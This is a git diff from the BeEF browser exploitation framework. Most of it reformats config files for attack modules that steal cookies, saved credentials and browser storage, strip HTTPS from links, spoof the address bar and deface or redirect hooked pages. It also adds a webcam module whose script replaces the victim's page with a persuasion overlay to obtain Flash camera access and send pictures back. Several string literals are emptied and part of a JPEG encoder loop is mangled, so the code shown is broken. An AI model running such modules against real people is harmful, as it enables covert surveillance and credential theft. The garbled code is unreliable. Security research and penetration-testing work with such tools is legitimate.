[BEEFHOOK] scrambled -> [#{config.get('beef.http.hook_session_name')}]" + end + end + + @output + end end end end diff --git a/install-beef b/install-beef index 2669588ff..5428316c6 100644 --- a/install-beef +++ b/install-beef @@ -1,3 +1,4 @@ +#!/bin/bash # # Copyright 2012 Wade Alcorn wade@bindshell.net # diff --git a/modules/browser/get_visited_domains/config.yaml b/modules/browser/get_visited_domains/config.yaml index dfcab7cf8..ee2921948 100644 --- a/modules/browser/get_visited_domains/config.yaml +++ b/modules/browser/get_visited_domains/config.yaml @@ -22,5 +22,5 @@ beef: description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/" authors: ["keith_lee @keith55 http://milo2012.wordpress.com"] target: - working: ["FF","IE"] - not_working: ["O","C","S"] + working: ["FF", "IE"] + not_working: ["O", "C", "S"] diff --git a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml index fb4f54fc8..8216f7223 100644 --- a/modules/browser/hooked_domain/ajax_fingerprint/config.yaml +++ b/modules/browser/hooked_domain/ajax_fingerprint/config.yaml @@ -17,11 +17,11 @@ beef: module: ajax_fingerprint: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Fingerprint Ajax" description: "Fingerprint Ajax and JS libraries present on the hooked page." authors: ["qswain"] target: - working: ["FF","S"] + working: ["FF", "S"] not_working: ["C"] diff --git a/modules/browser/hooked_domain/alert_dialog/config.yaml b/modules/browser/hooked_domain/alert_dialog/config.yaml index a5572a41d..2b9c05a1b 100644 --- a/modules/browser/hooked_domain/alert_dialog/config.yaml +++ b/modules/browser/hooked_domain/alert_dialog/config.yaml @@ -17,7 +17,7 @@ beef: module: alert_dialog: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Create Alert Dialog" description: "Sends an alert dialog to the hooked browser." authors: ["wade", "bm"] diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml index 22e8fdd4d..8d57a6cfe 100644 --- a/modules/browser/hooked_domain/deface_web_page/config.yaml +++ b/modules/browser/hooked_domain/deface_web_page/config.yaml @@ -17,7 +17,7 @@ beef: module: deface_web_page: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace Content (Deface)" description: "Overwrite the page, title and shortcut icon on the hooked page." authors: ["antisnatchor"] diff --git a/modules/browser/hooked_domain/get_cookie/config.yaml b/modules/browser/hooked_domain/get_cookie/config.yaml index b535101ef..a5670e31e 100644 --- a/modules/browser/hooked_domain/get_cookie/config.yaml +++ b/modules/browser/hooked_domain/get_cookie/config.yaml @@ -17,7 +17,7 @@ beef: module: get_cookie: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Cookie" description: "This module will retrieve the session cookie from the current page." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_local_storage/config.yaml b/modules/browser/hooked_domain/get_local_storage/config.yaml index 2d6d5a011..f008244b3 100644 --- a/modules/browser/hooked_domain/get_local_storage/config.yaml +++ b/modules/browser/hooked_domain/get_local_storage/config.yaml @@ -17,7 +17,7 @@ beef: module: get_local_storage: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Local Storage" description: "Extracts data from the HTML5 localStorage object." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_page_html/config.yaml b/modules/browser/hooked_domain/get_page_html/config.yaml index 77e2e9109..a4e51a376 100644 --- a/modules/browser/hooked_domain/get_page_html/config.yaml +++ b/modules/browser/hooked_domain/get_page_html/config.yaml @@ -17,7 +17,7 @@ beef: module: get_page_html: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Page HTML" description: "This module will retrieve the HTML from the current page." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_page_links/config.yaml b/modules/browser/hooked_domain/get_page_links/config.yaml index fd0422e2e..1b1ed13f3 100644 --- a/modules/browser/hooked_domain/get_page_links/config.yaml +++ b/modules/browser/hooked_domain/get_page_links/config.yaml @@ -17,7 +17,7 @@ beef: module: get_page_links: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Page HREFs" description: "This module will retrieve HREFs from the target page." authors: ["vo"] diff --git a/modules/browser/hooked_domain/get_session_storage/config.yaml b/modules/browser/hooked_domain/get_session_storage/config.yaml index 417d52853..39d1cff08 100644 --- a/modules/browser/hooked_domain/get_session_storage/config.yaml +++ b/modules/browser/hooked_domain/get_session_storage/config.yaml @@ -17,7 +17,7 @@ beef: module: get_session_storage: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Session Storage" description: "Extracts data from the HTML5 sessionStorage object." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/get_stored_credentials/config.yaml b/modules/browser/hooked_domain/get_stored_credentials/config.yaml index ad865fbc1..1c01a0391 100644 --- a/modules/browser/hooked_domain/get_stored_credentials/config.yaml +++ b/modules/browser/hooked_domain/get_stored_credentials/config.yaml @@ -17,7 +17,7 @@ beef: module: get_stored_credentials: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Get Stored Credentials" description: "This module retrieves saved username/password combinations from the login page on the hooked domain.

It will fail if more than one set of domain credentials are saved in the browser." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/link_rewrite/config.yaml b/modules/browser/hooked_domain/link_rewrite/config.yaml index a2420dcae..f458eb1e0 100644 --- a/modules/browser/hooked_domain/link_rewrite/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite/config.yaml @@ -17,7 +17,7 @@ beef: module: link_rewrite: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace HREFs" description: "This module will rewrite all the href attributes of all matched links." authors: ["passbe"] diff --git a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml index ab5dbbee4..176ec2f69 100644 --- a/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml +++ b/modules/browser/hooked_domain/link_rewrite_sslstrip/config.yaml @@ -17,7 +17,7 @@ beef: module: link_rewrite_sslstrip: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace HREFs (HTTPS)" description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten." authors: ["bcoles"] diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml index 163bf3056..b4a20fe33 100644 --- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml +++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml @@ -17,10 +17,10 @@ beef: module: mobilesafari_address_spoofing: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "iOS Address Bar Spoofing" description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')" - authors: ["bcoles","xntrik","majorsecurity.net"] + authors: ["bcoles", "xntrik", "majorsecurity.net"] target: working: S: diff --git a/modules/browser/hooked_domain/prompt_dialog/config.yaml b/modules/browser/hooked_domain/prompt_dialog/config.yaml index 8b3f21ac4..0f9035279 100644 --- a/modules/browser/hooked_domain/prompt_dialog/config.yaml +++ b/modules/browser/hooked_domain/prompt_dialog/config.yaml @@ -17,7 +17,7 @@ beef: module: prompt_dialog: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Create Prompt Dialog" description: "Sends a prompt dialog to the hooked browser." authors: ["wade", "bm"] diff --git a/modules/browser/hooked_domain/replace_video/config.yaml b/modules/browser/hooked_domain/replace_video/config.yaml index 9fb293c7e..f8ddbcda0 100644 --- a/modules/browser/hooked_domain/replace_video/config.yaml +++ b/modules/browser/hooked_domain/replace_video/config.yaml @@ -17,7 +17,7 @@ beef: module: replace_video: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Replace Videos" description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)." authors: ["Yori Kvitchko", "antisnatchor"] diff --git a/modules/browser/hooked_domain/rickroll/config.yaml b/modules/browser/hooked_domain/rickroll/config.yaml index d8014fcc2..f86c183fa 100644 --- a/modules/browser/hooked_domain/rickroll/config.yaml +++ b/modules/browser/hooked_domain/rickroll/config.yaml @@ -17,7 +17,7 @@ beef: module: rickroll: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser (Rickroll)" description: "Overwrite the body of the page the victim is on with a full screen Rickroll." authors: ["Yori Kvitchko"] diff --git a/modules/browser/hooked_domain/site_redirect/config.yaml b/modules/browser/hooked_domain/site_redirect/config.yaml index 306c3e7a2..3c9681e0a 100644 --- a/modules/browser/hooked_domain/site_redirect/config.yaml +++ b/modules/browser/hooked_domain/site_redirect/config.yaml @@ -17,7 +17,7 @@ beef: module: site_redirect: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser" description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input." authors: ["wade", "vo"] diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml index 9e5d349c3..ad73b2efe 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml +++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml @@ -17,7 +17,7 @@ beef: module: site_redirect_iframe: enable: true - category: ["Browser","Hooked Domain"] + category: ["Browser", "Hooked Domain"] name: "Redirect Browser (iFrame)" description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.

The content of the URL bar will not be changed in the hooked browser." authors: ["ethicalhack3r", "Yori Kvitchko"] diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js new file mode 100644 index 000000000..9ed0f73a5 --- /dev/null +++ b/modules/browser/webcam/command.js @@ -0,0 +1,70 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + + +beef.execute(function() { + + /* + If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons: + - Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox + - There is a bug in flash: http://forums.adobe.com/thread/880967 + - You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the + body_social_engineer_and_overlay below and try again. + */ + + + //The social engineering message and the overlay div's + var body_social_engineer_and_overlay = '

<%= @social_engineering_title %>

<%= @social_engineering_text %>

'; + + + //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string + var js_functions = ''; + + + //Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed) + //We'll notice when flash is not installed anyway... + //var body_flash_container = '

You need FlashPlayer 9 or higher!

Get Adobe Flash player

'; + var body_flash_container = '
'; + + + //The style is the only thing we already append to the head + var theHead = document.getElementsByTagName("head")[0]; + var style = document.createElement('style'); + style.type = 'text/css'; + style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }'; + theHead.appendChild(style); + + //A nice library that helps us to include the swf file + var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + var include_script = ''; + + //Empty body first + $j('body').html(''); + //Now show our flash stuff, muahahaha + $j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script); + +}); + + + + + diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml new file mode 100644 index 000000000..69f3eb5fb --- /dev/null +++ b/modules/browser/webcam/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + webcam: + enable: true + category: "Browser" + name: "Webcam" + description: "This module will show the Adobe Flash 'Allow Webcam' dialog to the user. The user has to click the allow button, otherwise this module will not return pictures.
The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string." + authors: ["floyd @floyd_ch"] + target: + working: ["All"] diff --git a/modules/browser/webcam/dev/com/adobe/images/BitString.as b/modules/browser/webcam/dev/com/adobe/images/BitString.as new file mode 100755 index 000000000..b5c2b8410 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/BitString.as @@ -0,0 +1,39 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + public class BitString + { + public var len:int = 0; + public var val:int = 0; + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as new file mode 100755 index 000000000..100d7e968 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as @@ -0,0 +1,648 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + import flash.geom.*; + import flash.display.*; + import flash.utils.*; + + /** + * Class that converts BitmapData into a valid JPEG + */ + public class JPGEncoder + { + + // Static table initialization + + private var ZigZag:Array = [ + 0, 1, 5, 6,14,15,27,28, + 2, 4, 7,13,16,26,29,42, + 3, 8,12,17,25,30,41,43, + 9,11,18,24,31,40,44,53, + 10,19,23,32,39,45,52,54, + 20,22,33,38,46,51,55,60, + 21,34,37,47,50,56,59,61, + 35,36,48,49,57,58,62,63 + ]; + + private var YTable:Array = new Array(64); + private var UVTable:Array = new Array(64); + private var fdtbl_Y:Array = new Array(64); + private var fdtbl_UV:Array = new Array(64); + + private function initQuantTables(sf:int):void + { + var i:int; + var t:Number; + var YQT:Array = [ + 16, 11, 10, 16, 24, 40, 51, 61, + 12, 12, 14, 19, 26, 58, 60, 55, + 14, 13, 16, 24, 40, 57, 69, 56, + 14, 17, 22, 29, 51, 87, 80, 62, + 18, 22, 37, 56, 68,109,103, 77, + 24, 35, 55, 64, 81,104,113, 92, + 49, 64, 78, 87,103,121,120,101, + 72, 92, 95, 98,112,100,103, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((YQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + YTable[ZigZag[i]] = t; + } + var UVQT:Array = [ + 17, 18, 24, 47, 99, 99, 99, 99, + 18, 21, 26, 66, 99, 99, 99, 99, + 24, 26, 56, 99, 99, 99, 99, 99, + 47, 66, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((UVQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + UVTable[ZigZag[i]] = t; + } + var aasf:Array = [ + 1.0, 1.387039845, 1.306562965, 1.175875602, + 1.0, 0.785694958, 0.541196100, 0.275899379 + ]; + i = 0; + for (var row:int = 0; row < 8; row++) + { + for (var col:int = 0; col < 8; col++) + { + fdtbl_Y[i] = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0)); + fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * aasf[row] * aasf[col] * 8.0)); + i++; + } + } + } + + private var YDC_HT:Array; + private var UVDC_HT:Array; + private var YAC_HT:Array; + private var UVAC_HT:Array; + + private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array + { + var codevalue:int = 0; + var pos_in_table:int = 0; + var HT:Array = new Array(); + for (var k:int=1; k<=16; k++) { + for (var j:int=1; j<=nrcodes[k]; j++) { + HT[std_table[pos_in_table]] = new BitString(); + HT[std_table[pos_in_table]].val = codevalue; + HT[std_table[pos_in_table]].len = k; + pos_in_table++; + codevalue++; + } + codevalue*=2; + } + return HT; + } + + private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0]; + private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d]; + private var std_ac_luminance_values:Array = [ + 0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12, + 0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07, + 0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08, + 0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0, + 0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16, + 0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28, + 0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39, + 0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49, + 0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59, + 0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69, + 0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79, + 0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89, + 0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98, + 0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7, + 0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6, + 0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5, + 0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4, + 0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2, + 0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea, + 0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0]; + private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_chrominance_nrcodes:Array = [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77]; + private var std_ac_chrominance_values:Array = [ + 0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21, + 0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71, + 0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91, + 0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0, + 0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34, + 0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26, + 0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38, + 0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48, + 0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58, + 0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68, + 0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78, + 0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87, + 0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96, + 0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5, + 0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4, + 0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3, + 0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2, + 0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda, + 0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9, + 0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private function initHuffmanTbl():void + { + YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values); + UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values); + YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values); + UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values); + } + + private var bitcode:Array = new Array(65535); + private var category:Array = new Array(65535); + + private function initCategoryNumber():void + { + var nrlower:int = 1; + var nrupper:int = 2; + var nr:int; + for (var cat:int=1; cat<=15; cat++) { + //Positive numbers + for (nr=nrlower; nr= 0 ) { + if (value & uint(1 << posval) ) { + bytenew |= uint(1 << bytepos); + } + posval--; + bytepos--; + if (bytepos < 0) { + if (bytenew == 0xFF) { + writeByte(0xFF); + writeByte(0); + } + else { + writeByte(bytenew); + } + bytepos=7; + bytenew=0; + } + } + } + + private function writeByte(value:int):void + { + byteout.writeByte(value); + } + + private function writeWord(value:int):void + { + writeByte((value>>8)&0xFF); + writeByte((value )&0xFF); + } + + // DCT & quantization core + + private function fDCTQuant(data:Array, fdtbl:Array):Array + { + var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number; + var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number; + var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number; + var i:int; + /* Pass 1: process rows. */ + var dataOff:int=0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+0] + data[dataOff+7]; + tmp7 = data[dataOff+0] - data[dataOff+7]; + tmp1 = data[dataOff+1] + data[dataOff+6]; + tmp6 = data[dataOff+1] - data[dataOff+6]; + tmp2 = data[dataOff+2] + data[dataOff+5]; + tmp5 = data[dataOff+2] - data[dataOff+5]; + tmp3 = data[dataOff+3] + data[dataOff+4]; + tmp4 = data[dataOff+3] - data[dataOff+4]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+4] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+2] = tmp13 + z1; /* phase 5 */ + data[dataOff+6] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+5] = z13 + z2; /* phase 6 */ + data[dataOff+3] = z13 - z2; + data[dataOff+1] = z11 + z4; + data[dataOff+7] = z11 - z4; + + dataOff += 8; /* advance pointer to next row */ + } + + /* Pass 2: process columns. */ + dataOff = 0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+ 0] + data[dataOff+56]; + tmp7 = data[dataOff+ 0] - data[dataOff+56]; + tmp1 = data[dataOff+ 8] + data[dataOff+48]; + tmp6 = data[dataOff+ 8] - data[dataOff+48]; + tmp2 = data[dataOff+16] + data[dataOff+40]; + tmp5 = data[dataOff+16] - data[dataOff+40]; + tmp3 = data[dataOff+24] + data[dataOff+32]; + tmp4 = data[dataOff+24] - data[dataOff+32]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+32] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+16] = tmp13 + z1; /* phase 5 */ + data[dataOff+48] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+40] = z13 + z2; /* phase 6 */ + data[dataOff+24] = z13 - z2; + data[dataOff+ 8] = z11 + z4; + data[dataOff+56] = z11 - z4; + + dataOff++; /* advance pointer to next column */ + } + + // Quantize/descale the coefficients + for (i=0; i<64; i++) { + // Apply the quantization and scaling factor & Round to nearest integer + data[i] = Math.round((data[i]*fdtbl[i])); + } + return data; + } + + // Chunk writing + + private function writeAPP0():void + { + writeWord(0xFFE0); // marker + writeWord(16); // length + writeByte(0x4A); // J + writeByte(0x46); // F + writeByte(0x49); // I + writeByte(0x46); // F + writeByte(0); // = "JFIF",'\0' + writeByte(1); // versionhi + writeByte(1); // versionlo + writeByte(0); // xyunits + writeWord(1); // xdensity + writeWord(1); // ydensity + writeByte(0); // thumbnwidth + writeByte(0); // thumbnheight + } + + private function writeSOF0(width:int, height:int):void + { + writeWord(0xFFC0); // marker + writeWord(17); // length, truecolor YUV JPG + writeByte(8); // precision + writeWord(height); + writeWord(width); + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0x11); // HVY + writeByte(0); // QTY + writeByte(2); // IdU + writeByte(0x11); // HVU + writeByte(1); // QTU + writeByte(3); // IdV + writeByte(0x11); // HVV + writeByte(1); // QTV + } + + private function writeDQT():void + { + writeWord(0xFFDB); // marker + writeWord(132); // length + 